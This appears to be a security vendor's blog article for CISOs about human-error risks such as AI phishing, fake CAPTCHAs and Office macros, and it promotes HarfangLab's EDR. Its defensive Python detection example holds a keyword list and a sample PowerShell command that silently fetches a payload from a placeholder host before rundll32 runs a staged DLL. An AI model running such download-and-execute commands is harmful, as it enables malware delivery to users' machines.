Cybersecurity and human error: A survival guide for CISOs

Despite extensive investments in cyber prevention and awareness, actions that seem harmless to information system users can have serious consequences for workspace security – such as clicking on a fraudulent link, downloading a malicious file, using a weak password, or sharing it in plain text.

Proofpoint’s “Voice of the CISO 2024” report reveals that three-quarters of CISOs still consider human error to be the main risk to cybersecurity. So how can you respond to an attack vector that boils down to human error? Here’s a look at some common mistakes and what to do in the event of a security incident.

Artificial intelligence

The use of artificial intelligence is growing by the day, and so are the risks to cybersecurity. What are they?

First, AI-powered phishing, smishing, and vishing campaigns allow for ever-greater personalization, more credible messages, and bigger mass mailings. Workspace users must be extra vigilant.

Second, users of generative AI may disclose confidential company information, posing a risk to data security.

Beyond platforms such as ChatGPT, Claude, or Gemini, users may also be tempted to install software or browser extensions that offer generative AI features but are actually infostealers. Fortunately, this type of malware can be detected by cybersecurity solutions such as EDR or EPP. As for chat solutions, awareness of the risks remains just as essential.

In addition, AI agents deployed on an information system can perform actions that compromise data security – either by mistake, due to misconfiguration, or through arbitrary code execution.

Finally, it is important for tech teams using AI to remember that the generated code may contain vulnerabilities. It must be reviewed before deployment to ensure the required level of security.

Malicious file upload

Old habits die hard: phishing (and its derivatives) is still going strong. As mentioned earlier, and as our experts point out, AI allows attackers to further personalize phishing, vishing, or smishing messages and send them en masse, as well as quickly process the data gathered through their malicious actions.

As messages become more and more credible, recipients are increasingly likely to fall into the trap and open a fraudulent attachment or link that will infect their workstation.

And that’s not to mention the risks associated with using USB devices containing malicious files.

To address these mounting risks, the cyber toolbox of CISOs and SOC Managers should include:

Pro tip

“Rich data and features that facilitate investigations are essential for cyber analysts. HarfangLab provides a correlation engine to group related security events into a single alert to reduce alert fatigue, as well as telemetry specific to Office macros for in-depth investigations in the event of a compromise. These are major assets for faster and more effective investigations.”

Benoit Maïzi, CTI Engineer – HarfangLab

Fake CAPTCHAs

Attackers can create pages with fake CAPTCHAs to trick users into executing malware – for example, Vidar or Lumma Stealer – which can be used as an access point for cybercrime or ransomware.

From these pages, the user may be prompted to open the command executor to paste a PowerShell command that will trigger the loading of a malicious file, allowing attackers to execute the rest of the steps in their attack, up to the installation of the payload on the endpoint – usually an infostealer.

To protect against this type of cyberattack, beyond raising awareness, EDR behavioral rules can detect the action of the user executing the command, as well as the rest of the execution chain.
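As an added illustration of the behavioral detection described above (this is example code written for this article, not HarfangLab's rule engine or rule format), the following Python groups constructed process-creation events from this chain into a single alert: PowerShell started directly by explorer.exe (the Run dialog) with a download or hidden-window switch, plus every process it spawns. The event fields, sample command lines and the `.invalid` placeholder domain are all constructed.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class ProcEvent:        # one process-creation event (constructed shape, not product telemetry)
    pid: int
    ppid: int
    image: str          # image file name, lower case
    cmdline: str

# Command-line cues that a Run-dialog PowerShell is fetching something or hiding its window.
SUSPICIOUS_TOKENS = ("http://", "https://", "-enc", "-w hidden", "-windowstyle hidden")

def is_run_dialog_powershell(ev: ProcEvent, parent: Optional[ProcEvent]) -> bool:
    """Behavioural rule: the shell (Win+R / Run dialog) starts PowerShell directly."""
    if parent is None or parent.image != "explorer.exe":
        return False
    if ev.image not in ("powershell.exe", "pwsh.exe"):
        return False
    cmd = ev.cmdline.lower()
    return any(tok in cmd for tok in SUSPICIOUS_TOKENS)

def correlate(events):
    """Group each flagged PowerShell launch with its whole process subtree into one alert."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    alerts = []
    for e in events:
        if not is_run_dialog_powershell(e, by_pid.get(e.ppid)):
            continue
        chain, stack = [], [e]
        while stack:                      # depth-first walk of the subtree below the root
            cur = stack.pop()
            chain.append(cur)
            stack.extend(children.get(cur.pid, []))
        alerts.append({"root_pid": e.pid, "reason": "PowerShell started from the Run dialog with download/hidden-window switches", "chain": chain})
    return alerts

# Constructed sample: one fake-CAPTCHA chain (pids 200, 300) and one legitimate admin script (210).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "powershell.exe", 'powershell -w hidden -c "iwr https://captcha-check.invalid/v"'),
    ProcEvent(300, 200, "rundll32.exe", "rundll32 C:\\Users\\Public\\stage.dll,Run"),
    ProcEvent(210, 100, "powershell.exe", "powershell -File C:\\Scripts\\backup.ps1"),
]
```

Calling `correlate(SAMPLE_EVENTS)` yields one alert whose chain holds pids 200 and 300; the admin script at pid 210 is not flagged because its command line carries none of the cues.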

Pro tip

“An Active Directory / Entra Domain can include a group configuration that can disable the launch of commands via Windows + R, and thus protect the endpoint against most CAPTCHA attacks.”

Benoit Maïzi, CTI Engineer – HarfangLab

Macros in Office documents

Macros are designed to save time by automating repetitive tasks. But they also pose a risk to the security of a workspace because they can be used to execute malicious code when a document is opened. Attackers can then use them to corrupt or steal data and infiltrate the information system via the corrupted document. Malicious macros can be embedded in legitimate macros, making them difficult to detect.

How can you protect your endpoints? For both proactive and reactive security:

  • Antivirus software to automatically detect and block known malicious files before they are downloaded on an endpoint
  • Static detection capabilities to identify malicious files present on the information system, either by signatures or by artificial intelligence
  • Detection of suspicious behavior in macros and their contents, for example, by a behavioral detection engine

Exploiting vulnerabilities in workspace tools

Attackers are constantly looking for vulnerabilities to exploit in operating systems or business applications.

In 2025, for example, SharePoint was at the center of a massive crisis: vulnerabilities in on-premises instances were exploited to execute code remotely and hijack servers.

Vulnerabilities can be detected using Attack Surface Management tools. When a vulnerability is still unknown, or when it is known but a patch has not yet been released, a high-performance cybersecurity shield is essential to detect suspicious behavior and limit the impact of its exploitation. In the case of SharePoint, HarfangLab’s EDR detected and blocked the execution of PowerShell processes, preventing the payload from being written and thus protecting against exploitation of the vulnerability.

How HarfangLab can help you in the event of a security incident

The HarfangLab platform offers several major advantages for cyber experts in preventing, identifying, and resolving incidents by limiting the impact of attackers on a workstation.

As we have seen, the Attack Surface Management tool can detect not only vulnerabilities but also Shadow IT; EPP can proactively block known threats with its antivirus, firewall, and USB port control tool; and we will see in detail how the EDR can respond to threats.

Fine-grained detection with transparent, accessible, customizable rules

HarfangLab integrates generic YARA and Sigma rules designed to detect malicious files and behaviors, with the ability to customize them according to the specific needs of the workspace: who should have access to what, which network connections are legitimate or not, which endpoints or groups of endpoints are authorized to connect to the Internet or a given IP address, to download files, to contain certain software, and so on.

In addition, the platform is accessible via API and all data can be exported for in-depth investigation, while choosing the environment in which to exploit the data.

Finally, this open and transparent access to 100% of the platform and data (configuration, detection rules, and telemetry) facilitates effective and rapid investigations following an alert, and allows weak signals to be identified so that a timely response can be planned in the event of a security incident. It also promotes seamless and smooth integration into an existing cyber ecosystem.

Artificial intelligence to detect unknown threats and speed up investigations and remediation

HarfangLab integrates an AI-based engine, Ashley, to detect unknown threats, including suspicious behavior that may turn out to be malicious – even before indicators of compromise or vulnerabilities are published.

AI remains at the heart of the remediation process with the LLM assistant Kio. Analysts can search for information in the platform’s documentation and request detailed analyses of incidents in natural language.
